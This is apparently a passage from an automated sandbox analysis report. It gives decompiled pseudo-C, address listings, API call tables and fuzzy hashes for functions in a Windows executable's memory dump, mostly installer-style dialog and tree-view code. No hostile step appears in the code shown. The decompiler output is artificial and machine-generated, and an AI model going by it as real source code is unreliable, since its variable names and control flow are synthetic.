										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00407127
0x0040712f
0x00407133
0x00407135
0x00407138
0x0040713a
0x0040713a
0x0040713c
0x00407143
0x00407145
0x00407145
0x0040714b
0x00407160
0x00407168
0x0040716a
0x0040716c
0x0040716f
0x00407170
0x00407170
0x00407176
0x00000000
0x00000000
0x00407178
0x0040717b
0x00000000
0x00000000
0x00000000
0x0040717b
0x0040717f
0x00407182
0x00407184
0x00407184
0x00407187
0x0040718d
0x0040718e
0x00000000
0x00000000
0x00000000
0x0040718e
0x00407193
0x00407196
0x00407198
0x00407198
0x0040719e
0x004071a0
0x004071b1
0x004071a4
0x004071a8
0x0040744d
0x00000000
0x0040744d
0x004071ae
0x004071af
0x004071af
0x004071b7
0x004071ba
0x004071be
0x004071c0
0x004071c2
0x004071c5
0x00000000
0x00000000
0x004071cd
0x004071d3
0x004071d5
0x004071d7
0x004071d8
0x004071ed
0x004071ed
0x004071f0
0x004071f2
0x004071f2
0x004071f4
0x004071f9
0x004071fb
0x00407202
0x00407204
0x0040720c
0x0040720c
0x0040720e
0x0040720f
0x0040721e
0x00407222
0x00407226
0x00407229
0x0040722c
0x00407231
0x00407234
0x0040723a
0x00407241
0x00407247
0x00407440
0x00407440
0x00407445
0x00407454
0x00000000
0x00000000
0x00000000
0x00407445
0x00407254
0x00407257
0x0040725a
0x0040725d
0x00407261
0x00000000
0x00000000
0x0040726c
0x0040726f
0x00407270
0x00407272
0x00407278
0x0040727b
0x00000000
0x00000000
0x00407281
0x00407282
0x00407285
0x00407288
0x0040728b
0x00407291
0x00407293
0x00407293
0x0040729b
0x0040729f
0x004072a4
0x004072c9
0x004072cf
0x004072d1
0x004072d3
0x004072d6
0x004072df
0x00000000
0x00000000
0x004072a6
0x004072a6
0x004072af
0x004072b3
0x00000000
0x00000000
0x004072c4
0x004072c4
0x004072c7
0x00000000
0x00000000
0x004072b7
0x004072ba
0x004072bc
0x004072c0
0x00000000
0x00000000
0x004072c2
0x004072c2
0x00000000
0x004072c4
0x004072e8
0x004072ee
0x004072f8
0x004072fa
0x004072ff
0x00407301
0x00407337
0x00407303
0x00407303
0x00407306
0x00407309
0x00407313
0x00407316
0x0040731d
0x00407328
0x0040732f
0x0040732f
0x00407339
0x0040733c
0x0040733e
0x00407344
0x00407344
0x0040734d
0x00407350
0x00407355
0x00407364
0x0040736c
0x00407371
0x00407395
0x0040739d
0x004073a1
0x004073a7
0x00407373
0x00407381
0x00407384
0x0040738a
0x0040738a
0x004073ab
0x00407366
0x00407366
0x00407366
0x004073bc
0x004073c0
0x004073cc
0x004073c7
0x004073ca
0x004073ca
0x004073d4
0x004073d9
0x004073e1
0x004073dd
0x004073df
0x004073df
0x004073e7
0x004073e9
0x004073f0
0x004073fa
0x00407404
0x00407420
0x00407424
0x00407269
0x0040726f
0x00407270
0x00407272
0x00407278
0x0040727b
0x00000000
0x00000000
0x00000000
0x0040727b
0x00000000
0x00000000
0x00000000
0x00000000
0x00407406
0x00407406
0x00407406
0x0040740b
0x00407414
0x0040741d
0x00000000
0x0040741d
0x0040742a
0x0040742a
0x0040742d
0x00407434
0x00407437
0x00000000
0x0040725a
0x004071da
0x004071dc
0x004071dc
0x004071e0
0x004071e3
0x004071e4
0x004071e4
0x00000000
0x004071dc
0x00407150
0x00407156
0x00000000

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404B80, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				void* _t205;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t287;
				long _t290;
				void* _t291;
				signed int _t300;
				signed int _t308;
				void* _t309;
				void* _t310;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f468;
				_v28 =  *0x42f434 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f43d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404ACE(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a874; // 0x0
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a888; // 0x0
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a874 = 0;
								 *0x42a888 = 0;
								 *0x42f4a0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404B4E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_t205 =  *0x42a888; // 0x0
									_v36 = _t205;
									_t206 =  *0x42f468;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f46c <= 0) {
										L86:
										if( *0x42f42c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ebfc; // 0x71a1b4
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f46c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a888);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4a0 = _a4;
					_v20 = 2;
					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
					 *0x42a87c =  *0x42a87c | 0xffffffff;
					_v16 = _t264;
					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a874 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E0040417B(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E0040417B(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f46c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										_t287 = SendMessageA(_v8, 0x1100, 0,  &_v88);
										_t309 =  *0x42a888; // 0x0
										 *(_t309 + _t329 * 4) = _t287;
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_t310 =  *0x42a888; // 0x0
									_v36 = 1;
									 *(_t310 + _t329 * 4) = _t290;
									_t291 =  *0x42a888; // 0x0
									_v16 =  *(_t291 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f46c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004041B0(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004041B0(_v12);
								L93:
								return E004041E2(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404b9e
0x00404ba6
0x00404bae
0x00404bb4
0x00404bcc
0x00404bcf
0x00404bd0
0x00404dfd
0x00404e04
0x00404e18
0x00404e06
0x00404e08
0x00404e0b
0x00404e0c
0x00404e13
0x00404e13
0x00404e24
0x00404e32
0x00404e35
0x00404e4b
0x00404ec0
0x00404ec3
0x00404ec5
0x00404ecf
0x00404edd
0x00404edd
0x00404edf
0x00404ee9
0x00404eef
0x00404ef2
0x00404ef5
0x00404f10
0x00404ef7
0x00404f01
0x00404f01
0x00404ef5
0x00404ee9
0x00000000
0x00404ec3
0x00404e50
0x00404e5b
0x00404e60
0x00404e67
0x00404e6c
0x00404e70
0x00404e7b
0x00404e7b
0x00404e7f
0x00404e83
0x00404e87
0x00404e9a
0x00404e89
0x00404e89
0x00404e90
0x00404e96
0x00404e92
0x00404e92
0x00404e92
0x00404e90
0x00404e9e
0x00404ea0
0x00404eb3
0x00404eb6
0x00404eb9
0x00404eb9
0x00404e83
0x00000000
0x00404e70
0x00404e52
0x00404e59
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404f13
0x00404f13
0x00404f1a
0x00404f8b
0x00404f93
0x00404f9b
0x00404f9b
0x00404fa4
0x00404fa6
0x00404fad
0x00404fb0
0x00404fb0
0x00404fb6
0x00404fbd
0x00404fc0
0x00404fc0
0x00404fc6
0x00404fcc
0x00404fd2
0x00404fd2
0x00404fdf
0x0040513f
0x00405146
0x00405163
0x00405169
0x0040517b
0x0040517b
0x00000000
0x00404fe5
0x00404fe7
0x00404fec
0x00404ff1
0x00404ff6
0x00404ff8
0x00404ff8
0x00404ff9
0x00404ffa
0x00404ffc
0x00404ffc
0x00405004
0x00405045
0x00405047
0x0040504c
0x00405057
0x0040505a
0x0040505f
0x00405066
0x00405069
0x0040510b
0x00405113
0x0040511b
0x0040511b
0x00405121
0x00405129
0x0040513a
0x0040513a
0x00000000
0x00405129
0x0040506f
0x00405072
0x00405078
0x0040507d
0x0040507f
0x00405081
0x00405087
0x0040508e
0x00405093
0x0040509a
0x0040509d
0x0040509d
0x004050a4
0x004050b0
0x004050b4
0x004050b6
0x004050b6
0x004050a6
0x004050a8
0x004050a8
0x004050d6
0x004050e2
0x004050f1
0x004050f1
0x004050f3
0x004050f6
0x004050ff
0x00000000
0x00405006
0x00405011
0x00405014
0x00405019
0x0040501b
0x0040501f
0x0040502f
0x00405039
0x0040503b
0x0040503e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405021
0x00405021
0x00405027
0x00405029
0x00405029
0x0040502a
0x0040502b
0x00000000
0x00405021
0x00405004
0x00404fdf
0x00404f22
0x00000000
0x00404f38
0x00404f42
0x00404f47
0x00000000
0x00000000
0x00404f59
0x00404f5e
0x00404f6a
0x00404f6a
0x00404f6c
0x00404f7b
0x00404f7d
0x00404f81
0x00404f84
0x00000000
0x00404f84
0x00404f22
0x00404bd6
0x00404bd9
0x00404bdc
0x00404bec
0x00404bff
0x00404c0a
0x00404c10
0x00404c1e
0x00404c31
0x00404c36
0x00404c41
0x00404c4a
0x00404c60
0x00404c70
0x00404c7c
0x00404c7c
0x00404c81
0x00404c87
0x00404c89
0x00404c8c
0x00404c91
0x00404c96
0x00404c98
0x00404c98
0x00404cb8
0x00404cb8
0x00404cba
0x00404cbb
0x00404cc0
0x00404cc6
0x00404cca
0x00404ccf
0x00404cd7
0x00404cdb
0x00404ce0
0x00404ce5
0x00404ced
0x00404cf0
0x00404dbf
0x00404dd2
0x00000000
0x00404cf6
0x00404cf9
0x00404cfc
0x00404cff
0x00404cff
0x00404d04
0x00404d0d
0x00404d10
0x00404d14
0x00404d17
0x00404d1a
0x00404d23
0x00404d2c
0x00404d2f
0x00404d32
0x00404d35
0x00404d73
0x00404d96
0x00404d98
0x00404d9e
0x00404d75
0x00404d84
0x00404d84
0x00404d37
0x00404d3a
0x00404d48
0x00404d52
0x00404d54
0x00404d5a
0x00404d61
0x00404d64
0x00404d6c
0x00404d6c
0x00404d35
0x00404da4
0x00404da5
0x00404db1
0x00404db1
0x00404dbd
0x00404dd8
0x00404ddb
0x00404df8
0x00000000
0x00404ddd
0x00404de2
0x00404deb
0x0040517d
0x0040518f
0x0040518f
0x00404ddb
0x00000000
0x00404dbd
0x00404cf0

APIs

GetDlgItem.USER32 ref: 00404B97
GetDlgItem.USER32 ref: 00404BA4
GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
LoadImageA.USER32 ref: 00404C0A
SetWindowLongA.USER32 ref: 00404C24
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
DeleteObject.GDI32(00000110), ref: 00404C81
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82

Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
GetWindowLongA.USER32 ref: 00404DC4
SetWindowLongA.USER32 ref: 00404DD2
ShowWindow.USER32(?,00000005), ref: 00404DE2
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
ImageList_Destroy.COMCTL32(00000000), ref: 00404FB0
GlobalFree.KERNEL32 ref: 00404FC0
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
ShowWindow.USER32(?,00000000), ref: 00405169
GetDlgItem.USER32 ref: 00405174
ShowWindow.USER32(00000000), ref: 0040517B

Strings

, xrefs: 00405153
N, xrefs: 00404E1B
M, xrefs: 00404D3A

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004042E6, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42985c =  *0x42985c + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E004041E2(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3c0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								E0040458A(_a4, _v8);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f428, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f428, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42985c != 0) {
						goto L25;
					} else {
						_t103 =  *0x42a068; // 0x71981c
						_t25 = _t103 + 0x14; // 0x719830
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404566();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ebfc; // 0x71a1b4
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f478;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004042B1;
				E0040417B(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E0040417B(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E004041B0(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f434 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x42985c = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42985c = 0;
				return 0;
			}

0x004042f6
0x0040441b
0x00404477
0x0040447b
0x00404548
0x0040454a
0x0040454a
0x00404550
0x00404550
0x00404553
0x00000000
0x0040455a
0x00404489
0x0040448b
0x00404495
0x004044a0
0x004044a3
0x004044a6
0x004044b1
0x004044b4
0x004044bb
0x004044c9
0x004044e1
0x004044e3
0x004044eb
0x004044fa
0x004044fc
0x004044fc
0x004044bb
0x00404506
0x00000000
0x00404511
0x00404515
0x00404526
0x00404526
0x0040452c
0x0040453a
0x0040453a
0x00000000
0x0040453e
0x00404506
0x00404426
0x00000000
0x0040443a
0x0040443a
0x00404440
0x00404440
0x00404446
0x00000000
0x00000000
0x0040446b
0x0040446d
0x00404472
0x00000000
0x00404472
0x00404426
0x004042fc
0x004042ff
0x00404304
0x00404306
0x00404315
0x00404315
0x0040431c
0x0040431f
0x00404321
0x00404326
0x0040432f
0x00404335
0x00404341
0x00404344
0x0040434d
0x00404352
0x00404355
0x0040435a
0x00404371
0x00404378
0x0040438b
0x0040438e
0x004043a3
0x004043aa
0x004043af
0x004043b4
0x004043b4
0x004043c3
0x004043d2
0x004043e4
0x004043e9
0x004043f9
0x004043fb
0x00000000

APIs

CheckDlgButton.USER32 ref: 00404371
GetDlgItem.USER32 ref: 00404385
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
GetSysColor.USER32(?), ref: 004043B4
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
